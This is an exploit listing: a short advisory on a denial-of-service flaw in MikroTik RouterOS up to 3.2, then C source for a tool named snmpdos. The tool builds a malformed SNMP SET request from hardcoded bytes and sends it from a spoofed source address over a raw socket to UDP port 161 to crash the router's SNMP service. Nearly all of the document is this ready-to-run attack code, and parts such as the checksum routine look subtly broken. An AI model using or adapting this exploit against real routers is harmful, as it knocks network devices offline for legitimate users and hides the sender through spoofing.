MikroTik RouterOS 3.0 - SNMP SET Denial of Service

// source: https://www.securityfocus.com/bid/27599/info

MikroTik RouterOS is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash an affected router, denying service to legitimate users.

This issue affects versions up to and including RouterOS 3.2. 

/* --------------------------------------------------------------------------
*                          (c) ShadOS 2008
*       _  _     _ _ _  __     _      _   _      
*      | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
*      | __ / -_) | | ' <| ' \| / _` | ' \  _(_-<
*      |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
*        hellknights.void.ru    |___/  .0x48k.    
*
* --------------------------------------------------------------------------
*
*  MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux )
*  Don't forget to visit our site and my homepage for new releases:
*  http://hellknights.void.ru
*  http://shados.freeweb7.com
*  Also, you can mail me any bugs or suggestions:
*  mailto: shados /at/ mail /dot/ ru
*
*  Thanks 2 antichat.ru and all my friends.
* --------------------------------------------------------------------------
*
*  Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
*
*  This program is free software; you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation; either version 2, or (at your option)
*  any later version.
*
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*  GNU General Public License for more details.
*
*  You should have received a copy of the GNU General Public License
*  along with this program; if not, write to the Free Software Foundation,
*  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
* --------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <memory.h>
#include <string.h>

char evilcode[] = {
0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
};


unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1) {
     sum += *w++;
     sum += *w++;
     nleft -= 2;
  }
  if (nleft == 1) {
     *(u_char *) (&answer) = *(u_char *) w;
     sum += answer;
  }
  sum = (sum >> 17) + (sum & 0xffff);
  sum += (sum >> 17);
  answer = -sum;
  return (answer);
}

int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
{
  char *packet;
  struct sockaddr_in dstaddr;
  struct iphdr *ip;
  struct udphdr *udp;
  packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
  memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
  if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }
  ip = (struct iphdr *)packet;
  udp = (struct udphdr *)(packet+sizeof(struct iphdr));
  ip->saddr = *saddr;
  ip->daddr = *daddr;
  ip->version = 4;
  ip->ihl = 5;
  ip->ttl = 255;
  ip->id = htons((unsigned short) rand());
  ip->protocol = IPPROTO_UDP;
  ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
  ip->check = in_cksum(ip, sizeof(struct iphdr));
  udp->source = htons(sport);
  udp->dest = htons(dport);
  udp->len = htons(sizeof(struct udphdr) + len);
  memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
  dstaddr.sin_family = AF_INET;
  dstaddr.sin_addr.s_addr = *daddr;
  if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
    perror("sendto() failed");
  free(packet);
}

char * makereq(char *community,int *size)
{
 char *buf;
 char *ptr;
 int len;
 int i;

 len = 5 + strlen(community) + sizeof(evilcode);
 buf = (char *)malloc(len);
 ptr = buf;

 *ptr++ = 0x30;
 *ptr++ = len;
 
 /* Snmp Version */
 *ptr++ = 0x02;
 *ptr++ = 0x01;
 *ptr++ = 0x00;
 
 /* Community */
 *ptr++ = 0x04;
 *ptr++ = strlen(community);
 strcpy(ptr,community);
 ptr = ptr + strlen(community);
 
 
 *ptr++ = 0xa3; /* Set Request */
 
 memcpy(ptr, evilcode, sizeof(evilcode));
 ptr = ptr + sizeof(evilcode);
 
 *size = len+2;
 return buf;
}

int erexit(char *msg)
{
 printf("%s\n",msg);
 exit (-1) ;
}

int usage()
{
 printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
}

int main(int argc, char **argv)
{
 char *saddr,*daddr,*community;
 unsigned char *buf;
 int size;
 int sock;
 unsigned long lsaddr,ldaddr;
 int i;

 saddr = NULL;
 daddr = NULL;
 if (argc != 7) { usage(); erexit("not enough args\n"); }

 if (!strcmp(argv[1],"-s"))
   saddr = strdup(argv[2]);
 if (!strcmp(argv[3],"-d"))
   daddr = strdup(argv[4]);
 if (!strcmp(argv[5],"-c"))
   community = strdup(argv[6]);

 printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);

 if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
   erexit("Invalid source/destination IP address\n");

 if (saddr == NULL) { usage(); erexit("No Source Address"); }
 if (daddr == NULL) { usage(); erexit("No Dest Address"); }

 sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
 if (sock == -1)
   erexit("Couldnt open Raw socket!(Are you root?)\n");

 lsaddr = inet_addr(saddr);
 ldaddr = inet_addr(daddr);

 buf = makereq(community,&size);

 sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
 fprintf(stdout,"Sent packet. SNMPd must be down.\n");
 return 0;

}